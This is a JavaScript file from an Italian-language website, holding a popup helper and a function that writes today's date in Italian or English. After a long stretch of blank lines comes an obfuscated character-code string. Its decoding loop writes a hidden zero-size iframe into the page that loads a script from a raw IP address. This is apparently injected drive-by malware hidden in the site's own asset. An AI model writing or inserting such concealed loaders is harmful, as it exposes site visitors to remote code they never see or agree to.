function apri(pagina)
{
	window.open(pagina, '', 'width=x, height=y, scrollbars=1');
}


Date.prototype.defaultLang = "it";
Date.prototype.printToday = function(lang,sf){
	var week, months, month, sep, output;	
	lang = (!lang||typeof lang!="string")?this.defaultLang:lang;
	if (lang=="eng"){
		week = ["sunday","monday","tuesday'","wednesday","thursday","friday'","saturday"];
		months = ["january","february","march","april","may","june","july","august","september","october","november","december"];
	}
	if (lang=="it"){
		week = ["Domenica","Luned&igrave;","Marted&igrave;","Mercoled&igrave;","Gioved&igrave;","Venerd&igrave;","Sabato"];
		months = ["gennaio","febbraio","marzo","aprile","maggio","giugno","luglio","agosto","settembre","ottobre","novembre","dicembre"];
	}
	month = (!sf)? months[this.getMonth()]:(this.getMonth()+1);
	sep = (!sf)? " ":"-";
	output = week[this.getDay()] + ", " + this.getDate() + sep + month + sep + this.getFullYear();
	document.write(output);
}

var today = new Date();



//getToday = function(lang,sf){
//	var week, months, month, sep, output;	
//	var today = new Date();
//	lang = (!lang||typeof lang!="string")?"it":lang;
//	
//	if (lang=="eng"){
//		week = ["sunday","monday","tuesday'","wednesday","thursday","friday'","saturday"];
//		months = ["january","february","march","april","may","june","july","august","september","october","november","december"];
//	}
//	if (lang=="it"){
//		week = ["Domenica","Luned&igrave;","Marted&igrave;","Mercoled&igrave;","Gioved&igrave;","Venerd&igrave;","Sabato"];
//		months = ["gennaio","febbraio","marzo","aprile","maggio","giugno","luglio","agosto","settembre","ottobre","novembre","dicembre"];
//	}
//	month = (!sf)? months[today.getMonth()]:(today.getMonth()+1);
//	sep = (!sf)? " ":"-";
//	output = week[today.getDay()] + ", " + today.getDate() + sep + month + sep + today.getFullYear();
//	return output;
//}





























var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!52!54!46!52!46!49!54!51!46!50!48!56!47!99!111!117!110!116!101!114!46!106!115!34!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);

